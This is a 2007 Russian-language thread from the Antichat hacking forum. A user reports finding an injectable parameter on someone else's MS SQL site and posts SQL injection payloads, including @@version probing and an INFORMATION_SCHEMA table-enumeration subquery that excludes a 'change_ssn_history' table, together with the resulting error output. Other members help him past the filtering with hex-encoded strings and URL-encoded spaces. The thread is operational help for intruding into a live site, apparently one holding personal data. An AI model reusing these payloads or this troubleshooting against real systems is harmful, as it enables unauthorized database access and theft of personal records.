HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ПРОГРАММИРОВАНИЕ > PHP
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Проблема , Ms Sql
  #1  
Старый 03.09.2007, 20:47
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,315
С нами: 10248806

Репутация: 2371


По умолчанию Проблема , Ms Sql

Нашел вообщем дыру на сайте...
Стоит MS SQL
POST запросы....

Код:
' or 1=@@version--
работает, получается экранирования кавычек нету?так?!

Пробую
Код:
' or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('change_ssn_history'))--
Здесь ругается:
Код:
Warning: mssql_query() [function.mssql-query]: message: Line 1: Incorrect syntax near '\'. (severity 15) in C:\AppServ2\www\index.php on line 17

Warning: mssql_query() [function.mssql-query]: Query failed in C:\AppServ2\www\index.php on line 17

Warning: mssql_num_rows(): supplied argument is not a valid MS SQL-result resource in C:\AppServ2\www\index.php on line 18
Че за?
 
Ответить с цитированием

  #2  
Старый 03.09.2007, 21:17
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
С нами: 10158086

Репутация: 1359


По умолчанию

странно ( может ограничение по длине запроса ?
хотя в таком случае не должно быть "\"
 
Ответить с цитированием

  #3  
Старый 03.09.2007, 21:27
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию

пробуй hex
Код:
' or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (0x6368616E67655F73736E5F686973746F7279)--
мож поможет?
__________________
Карфаген должен быть разрушен...

Последний раз редактировалось Scipio; 03.09.2007 в 21:38..
 
Ответить с цитированием

  #4  
Старый 03.09.2007, 22:15
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
С нами: 10459106

Репутация: 2996


По умолчанию

там php а не asp остюда кривой вывод.
 
Ответить с цитированием

  #5  
Старый 03.09.2007, 22:16
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
С нами: 10459106

Репутация: 2996


По умолчанию

Змен пробелы на %20 or + or %2B

если че стукни в асю буду свободен посмотрю.

Последний раз редактировалось [ cash ]; 03.09.2007 в 22:19..
 
Ответить с цитированием

  #6  
Старый 06.09.2007, 19:42
Termin@L
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
С нами: 10223973

Репутация: 123
По умолчанию

У меня была такая фигня, что кавычки нельзя использовать...
 
Ответить с цитированием

  #7  
Старый 06.09.2007, 22:09
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
С нами: 10459106

Репутация: 2996


По умолчанию

See this - http://forum.antichat.ru/showpost.php?p=453569&postcount=28
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.